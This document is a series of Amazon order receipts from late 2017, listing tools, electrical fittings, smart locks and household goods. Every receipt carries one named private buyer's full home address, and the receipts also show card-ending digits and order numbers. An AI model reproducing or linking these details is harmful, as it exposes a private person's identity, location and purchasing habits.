$0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.99 United States Credit Card transactions AmazonPLCC ending in 3157: December 21, 2017:$9.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4994652-4281838 Order Placed: December 19, 2017 Amazon.com order number: 111-4994652-4281838 Order Total: $241.37 Shipped on December 20, 2017 Items Ordered Price 1 of: Starrett Measure Stix SM412WRL Steel White Measure Tape with Adhesive Backing, English Graduation Style, Right To Left Reading, 12' Length, 0.5" Width, 0.0625" Graduation Interval Sold by: Amazon.com Services LLC $5.84 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 20, 2017 Items Ordered Price 1 of: Milescraft 1600 Tri Grips Non-Slip Work Supports, 4-Piece $15.55 Sold by: Amazon.com Services LLC Condition: New 1 of: FastCap Glu-Bot Glue Bottle (16 Ounces) $7.90 Sold by: Industrial Esentials (seller profile) Condition: New 1 of: Allied Tools 31607 7-Inch End Nipper Pliers $10.47 Sold by: Amazon.com Services LLC Condition: New 1 of: MOPOLIS Cut Resistant Gloves Level 5 Hand Protection Food Grade Kitchen Work $14.99 Safety Gloves for Cutting and Slicing, Wood Carving, Cut Proof Knife Resistant Gloves All Sizes 1 Pair Grey (Large) Sold by: MOPOLIS (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 23, 2017 Items Ordered Price 1 of: Slipstick CB700 Universal Bench Grippers with Non Slip Grip Surface For $14.95 Woodworking, Painting, Leveling, Raising, & Supporting (Set of 8 Stackable Grippers) 2-3/4” Round x ½” Tall -Orange Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 20, 2017 Items Ordered Price 1 of: PORTER-CABLE 560 QUIKJIG Pocket-Hole Joinery System Sold by: Amazon.com Services LLC $159.79 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $229.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $229.49 BRIAN J COADY Estimated tax to be collected: $11.88 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$241.37 United States Credit Card transactions AmazonPLCC ending in 3157: December 23, 2017: $15.81 AmazonPLCC ending in 3157: December 20, 2017:$225.56 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-3477036-6671433 Order Placed: December 19, 2017 Amazon.com order number: 111-3477036-6671433 Order Total: $210.44 Shipped on December 20, 2017 Items Ordered Price 1 of: BOSTITCH BTFP3KIT 3-Tool and Compressor Combo Kit $199.00 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Grand Total:$210.44 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $199.00 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $199.00 Estimated tax to be collected: $11.44 WASHINGTON, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: December 20, 2017:$210.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7553323-5741032 Order Placed: December 13, 2017 Amazon.com order number: 111-7553323-5741032 Order Total: $313.34 Shipped on December 14, 2017 Items Ordered 1 of: VOLTCLAW COMBO-PACK Nonconductive Electrical Wire Pliers Sold by: VoltClaw (seller profile) | Product question? Ask Seller Condition: New Price $29.95 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 15, 2017 Items Ordered 1 of: Rockwell RK9002 JawHorse Sheetmaster Portable Workstation Sold by: Amazon.com Services LLC Condition: New Price $192.99 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 14, 2017 Items Ordered Price Print this page for your records. Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $297.93 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $297.93BRIAN J COADY Estimated tax to be collected: $15.411454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$313.34 United States Credit Card transactions Visa ending in 4452: December 15, 2017:$313.34 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4911634-5114654 Order Placed: December 13, 2017 Amazon.com order number: 111-4911634-5114654 Order Total: $109.32 Shipped on December 14, 2017 Items Ordered Price 4 of: Leviton AGTR1-W SmartlockPro Dual Function AFCI/GFCI Receptacle, 15 $23.97 Amp/125V, White Sold by: Amazon.com Services LLC Condition: New 1 of: Sperry Instruments GFI6302 GFCI Outlet / Receptacle Tester, Standard 120V AC $7.49 Outlets, 7 Visual Indication / Wiring Legend, Home & Professional Use, Yellow & Black Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $103.37 Visa | Last digits: 4452 Shipping & Handling: $19.95 Free Shipping: -$19.95 Billing address BRIAN J COADY Total before tax: $103.371454 MONROE ST NW Estimated tax to be collected: $5.95WASHINGTON, DC 20010 United States Grand Total:$109.32 Credit Card transactions Visa ending in 4452: December 14, 2017:$109.32 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9540854-6476252 Order Placed: December 11, 2017 Amazon.com order number: 114-9540854-6476252 Order Total: $127.61 Shipped on December 12, 2017 Items Ordered Price 1 of: Arlington NM94-25 Black Button Push-In NM Cable Connector, 3/8 Trade Size, $8.61 Fits 1/2-Inch Knock Outs, Black, 25-Pack Sold by: Amazon.com Services LLC Condition: New 1 of: Pit Bull CHIHD190 2 lb Neon Dead Blow Hammer $10.34 Sold by: GeeksHive, Inc. (seller profile) Condition: New 4 of: Leviton AGTR2-W SmartlockPro Dual Function AFCI/GFCI Receptacle, 20 $25.57 Amp/125V, White Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $121.23 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $26.94 Free Shipping: -$26.94 Billing address BRIAN J COADY Total before tax: $121.23 1454 MONROE ST NW Estimated tax to be collected: $6.38 WASHINGTON, DC 20010 United States Grand Total:$127.61 Credit Card transactions AmazonPLCC ending in 3157: December 12, 2017:$127.61 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-2414257-3792228 Order Placed: December 11, 2017 Amazon.com order number: 114-2414257-3792228 Order Total: $23.42 Shipped on December 12, 2017 Items Ordered Price 1 of: Malco GND Gutter Nail Driver to Easily Attach Gutter and Fascia Sold by: MyUSTools (seller profile) $23.42 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $23.42 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $23.42 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.42 United States Credit Card transactions AmazonPLCC ending in 3157: December 12, 2017:$23.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0944485-1945014 Order Placed: December 7, 2017 Amazon.com order number: 114-0944485-1945014 Order Total: $47.97 Shipped on December 8, 2017 Items Ordered Price 1 of: Tacklife SC-L01 -50 Feet Laser Level Self-Leveling Horizontal and Vertical Cross-$47.97 Line Laser -Magnetic Mount Base and Carrying Pouch, Battery Included Sold by: TacklifeDirect (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $47.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $47.971454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$47.97 Credit Card transactions AmazonPLCC ending in 3157: December 8, 2017:$47.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9336042-5971467 Order Placed: December 7, 2017 Amazon.com order number: 114-9336042-5971467 Order Total: $46.10 Shipped on December 8, 2017 Items Ordered 1 of: CEPCO Tool IK-10 Insul-Knife Sold by: Amazon.com Services LLC Price $43.59 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $43.59 Visa | Last digits: 4452 Shipping & Handling: $6.99 Free Shipping: -$6.99 Billing address BRIAN J COADY Total before tax: $43.591454 MONROE ST NW Estimated tax to be collected: $2.51WASHINGTON, DC 20010 United States Grand Total:$46.10 Credit Card transactions Visa ending in 4452: December 8, 2017:$46.10 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9293042-2845862 Order Placed: December 7, 2017 Amazon.com order number: 114-9293042-2845862 Order Total: $19.58 Shipped on December 9, 2017 Items Ordered Price 1 of: Klein Tools 69411 Circuit Breaker Finder Accessory Kit Sold by: HomElectrical (seller profile) $15.59 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.59 Visa | Last digits: 4452 Shipping & Handling: $3.99 Billing address Total before tax: $19.58 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.58 United States Credit Card transactions Visa ending in 4452: December 9, 2017:$19.58 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7722826-4682663 Order Placed: December 7, 2017 Amazon.com order number: 114-7722826-4682663 Order Total: $82.44 Shipped on December 10, 2017 Items Ordered Price 1 of: Wallboarder's Buddy drywall cutter Sold by: Wallboarders Buddy (seller profile) $59.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $59.95 Visa | Last digits: 4452 Shipping & Handling: $22.49 Billing address Total before tax: $82.44 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$82.44 United States Credit Card transactions Visa ending in 4452: December 10, 2017:$82.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3584705-2331459 Order Placed: December 7, 2017 Amazon.com order number: 114-3584705-2331459 Order Total: $27.19 Shipped on December 8, 2017 Items Ordered Price 1 of: Dynarex Sharps Container -Biohazard Multiple-Use Needle Disposable -Puncture $10.29 Resistant -One Handed Use -2 Gallon Sold by: MedicalRite (seller profile) Condition: New 2 of: Capri Tools CP21077 Capri Tools 4-1/2 inch Premium Suction Cup, Glass, Dent $7.99 Puller, Blue Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $26.27 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $26.27 BRIAN J COADY Estimated tax to be collected: $0.921454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$27.19 United States Credit Card transactions Visa ending in 4452: December 8, 2017:$27.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3321071-2700219 Order Placed: December 7, 2017 Amazon.com order number: 114-3321071-2700219 Order Total: $12.00 Shipped on December 8, 2017 Items Ordered Price 1 of: Porter Cable 12478-5 9" 3 TPI Aggressive Wood Cutting Reciprocating Saw Blades $7.50 Sold by: MHS Inc (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Visa | Last digits: 4452 Item(s) Subtotal: Shipping & Handling: $7.50 $4.50 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $12.00 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010 United States Grand Total:$12.00 Credit Card transactions Visa ending in 4452: December 8, 2017:$12.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5153212-9604261 Order Placed: November 29, 2017 Amazon.com order number: 114-5153212-9604261 Order Total: $80.91 Shipped on November 30, 2017 Items Ordered Price 1 of: Klein Tools ET300 Digital Circuit Breaker Finder Sold by: Amazon.com Services LLC $39.70 Condition: New 1 of: Etekcity MSR-C600 Digital Clamp Meter Multimeters , Auto-Ranging Multimeter AC/DC voltmeter with Voltage, AC Current, Amp, Volt, Ohm, Diode and Resistance Test Tester Sold by: Etekcity (seller profile) $26.98 Condition: New 1 of: Non-Contact Voltage Tester Electrical Voltage Detector Pen 12-1000V AC Inductive Electric Tester Pen Digital Multimeter Volt Meter with Alarm Mode Live/Null Wire Judgment Aidbucks PM8908C Sold by: Aidbucks (seller profile) $11.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $78.63 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $78.63 BRIAN J COADY Estimated tax to be collected: $2.28 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$80.91 United States Credit Card transactions Visa ending in 4452: November 30, 2017:$80.91 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-5096026-4660257 Order Placed: November 28, 2017 Amazon.com order number: 111-5096026-4660257 Order Total: $21.67 Shipped on November 30, 2017 Items Ordered Price 1 of: Gardener's Blue Ribbon T017B Fabric Sturdy Tree Wrap Sold by: Amazon.com Services LLC $12.50 Condition: New 1 of: Tanglefoot Tree Wound Pruning Sealer & Grafting Compound Sold by: Amazon.com Services LLC $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $20.49 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $20.49 BRIAN J COADY Estimated tax to be collected: $1.181454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$21.67 United States Credit Card transactions Visa ending in 4452: November 30, 2017:$21.67 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6858296-9743430 Order Placed: November 28, 2017 Amazon.com order number: 111-6858296-9743430 Order Total: $155.48 Shipped on November 30, 2017 Items Ordered Price 1 of: 4Pcs Countersink Drill Bits Set 3/4/5/6mm HSS Carpentry Reamer Woodworking Chamfer Counter Bit Set by JelBo Sold by: US_JelBo® (seller profile) | Product question? Ask Seller $8.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Shipped on November 30, 2017 Items Ordered Price 1 of: YARDMAX YM0046 1.6 Cu. Ft. Concrete Mixer $139.00 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $147.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $147.49 BRIAN J COADY Estimated tax to be collected: $7.99 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$155.48 United States Credit Card transactions AmazonPLCC ending in 3157: November 30, 2017:$146.99 AmazonPLCC ending in 3157: November 30, 2017: $8.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-2869955-1976257 Order Placed: November 28, 2017 Amazon.com order number: 111-2869955-1976257 Order Total: $80.28 Shipped on November 30, 2017 Items Ordered Price 2 of: Little Giant 10111 Wing Span/Wall Standoff $28.88 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on November 30, 2017 Items Ordered Price 2 of: Ziploc XL HD Big Bag (4 Bags) $9.60 Sold by: Century_Six (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $76.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $76.96 BRIAN J COADY Estimated tax to be collected: $3.32 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$80.28 United States Credit Card transactions AmazonPLCC ending in 3157: November 30, 2017:$80.28 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-2451511-2755403 Order Placed: November 25, 2017 Amazon.com order number: 111-2451511-2755403 Order Total: $19.59 Shipped on November 25, 2017 Items Ordered Price 1 of: Dust-Off Compressed Gas Duster, Pack of 4 Sold by: AllyDayi (seller profile) $19.59 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $19.59 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.59 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.59 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2017:$19.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2545335-3765041 Order Placed: November 23, 2017 Amazon.com order number: 111-2545335-3765041 Seller's order number: 161786 Order Total: $59.95 Shipped on November 24, 2017 Items Ordered Price 1 of: Porter Cable PCC640 20V Max Lithium Ion 1/4" Hex Impact Driver (Bare Tool No Battery, Charger or Case) Sold by: David's Tools (seller profile) $59.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $59.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $59.95 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$59.95 United States Credit Card transactions AmazonPLCC ending in 3157: November 24, 2017:$59.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3776359-7661010 Order Placed: November 23, 2017 Amazon.com order number: 111-3776359-7661010 Order Total: $12.99 Shipped on November 24, 2017 Items Ordered Price 1 of: Dexil Luxury Cat Harness Padded and Water Resistant (Black L-XL) Sold by: Friendly Dog Collars (seller profile) | Product question? Ask Seller $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$12.99 United States Credit Card transactions AmazonPLCC ending in 3157: November 24, 2017:$12.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0048940-7864206 Order Placed: November 23, 2017 Amazon.com order number: 112-0048940-7864206 Order Total: $12.99 Shipped on November 24, 2017 Items Ordered Price 1 of: Dexil Luxury Cat Harness Padded and Water Resistant (Black L-XL) Sold by: Friendly Dog Collars (seller profile) | Product question? Ask Seller $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$12.99 United States Credit Card transactions AmazonPLCC ending in 3157: November 24, 2017:$12.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5345015-1940230 Order Placed: November 20, 2017 Amazon.com order number: 112-5345015-1940230 Order Total: $57.22 Shipped on November 21, 2017 Items Ordered Price 1 of: Wagan 2577 Personal Fridge/Warmer -7L Capacity Sold by: Amazon.com Services LLC $45.12 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $45.12 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $8.99 Billing address Total before tax: $54.11 BRIAN J COADY Estimated tax to be collected: $3.111454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$57.22 United States Credit Card transactions AmazonPLCC ending in 3157: November 21, 2017:$57.22 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8402734-1269857 Order Placed: November 17, 2017 Amazon.com order number: 111-8402734-1269857 Order Total: $95.98 Shipped on November 17, 2017 Items Ordered Price 1 of: Extra Long 100% Blackout Faux Silk Curtains / Window Treatments Nickel Grommet Lined Panel Draperies for Living Room/Bedroom (52x108 Inch -Set of 2 Black) Sold by: H.VERSAILTEX (seller profile) | Product question? Ask Seller $49.99 Condition: New 1 of: 100% Blackout Curtains for Bedroom Living Room Energy Saving Thermal Insulated Window Panels Faux Silk with Liner Backing 2 Panels for Patio Door, Solid Beige, 52x96 -Inch Sold by: H.VERSAILTEX (seller profile) | Product question? Ask Seller $45.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $95.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $95.98 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$95.98 United States Credit Card transactions AmazonPLCC ending in 3157: November 17, 2017:$95.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-9305862-5102617 Order Placed: November 16, 2017 Amazon.com order number: 111-9305862-5102617 Order Total: $5.25 Shipped on November 16, 2017 Items Ordered Price 1 of: SquareTrade 4-Year Home Improvement Protection Plan ($125-149.99) Sold by: Allstate Protection Plans (seller profile) $4.96 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $4.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $4.96 BRIAN J COADY Estimated tax to be collected: $0.29 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$5.25 United States Credit Card transactions AmazonPLCC ending in 3157: November 16, 2017:$5.25 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4176283-9200226 Order Placed: November 16, 2017 Amazon.com order number: 111-4176283-9200226 Order Total: $338.71 Shipped on November 16, 2017 Items Ordered Price 1 of: August Smart Lock (with 3rd generation technology) -Silver $149.00 Sold by: Amazon.com Services LLC Condition: New 1 of: August Smart Lock 2nd Generation – Dark Gray, Works with Amazon Alexa $171.29 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Total before tax: $320.29 Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $320.29 Shipping & Handling: $5.99 Billing address Free Shipping: -$5.99 BRIAN J COADY 1454 MONROE ST NW Estimated tax to be collected: $18.42WASHINGTON, DC 20010 United States Grand Total:$338.71 Credit Card transactions AmazonPLCC ending in 3157: November 16, 2017:$338.71 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2509884-4928246 Order Placed: November 14, 2017 Amazon.com order number: 111-2509884-4928246 Order Total: $10.44 Shipped on November 15, 2017 Items Ordered Price 1 of: GREEN UV Black Light 4oz, Neon, Rave, Fluorescent, Acrylic Paint Sold by: GloManiaUSA (seller profile) $5.99 Condition: New New pot of 4oz GREEN UV Black Light Acrylic Based paint. Not suitable for young children unless supervised. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $5.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.05 Thanksgiving Promo: -$0.60 Billing address BRIAN J COADY Total before tax: $10.441454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$10.44 Credit Card transactions AmazonPLCC ending in 3157: November 15, 2017:$10.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7161463-9269823 Order Placed: November 11, 2017 Amazon.com order number: 111-7161463-9269823 Order Total: $54.44 Shipped on November 13, 2017 Items Ordered Price 2 of: Ziploc Big Bag Double Zipper, Large, 5-Count by Ziploc Sold by: Amazing Pride (seller profile) $13.30 Condition: New 2 of: Ziploc XL HD Big Bag (4 Bags) Sold by: Amazing Pride (seller profile) $13.92 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $54.44 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $54.44 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$54.44 United States Credit Card transactions AmazonPLCC ending in 3157: November 13, 2017:$54.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1070283-1953069 Order Placed: November 11, 2017 Amazon.com order number: 111-1070283-1953069 Order Total: $25.20 Shipped on November 13, 2017 Items Ordered Price 2 of: Ziploc Big Bags, Large, 5 Count Sold by: Hearthshire (seller profile) $12.60 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $25.20 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $25.20 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$25.20 United States Credit Card transactions AmazonPLCC ending in 3157: November 13, 2017:$25.20 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6879296-0356213 Order Placed: November 11, 2017 Amazon.com order number: 111-6879296-0356213 Order Total: $70.98 Shipped on November 12, 2017 Items Ordered Price 1 of: LimoStudio Table Top Black & White Acrylic Reflective Display Table kit for Product Photography, AGG838 Sold by: KimOutlet (seller profile) $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on November 12, 2017 Items Ordered Price 1 of: LimoStudio 24" Table Top Photography Studio Light Tent Kit in a Box -Photo $55.99 Tent, 2x Double Head Light Set, Mini Camera Stand, 2x GU10 Light Bulbs, AGG903 Sold by: KimOutlet (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $70.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $70.98 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$70.98 United States Credit Card transactions AmazonPLCC ending in 3157: November 12, 2017:$55.99 AmazonPLCC ending in 3157: November 12, 2017:$14.99 Conditions of Use | Privacy Notice © 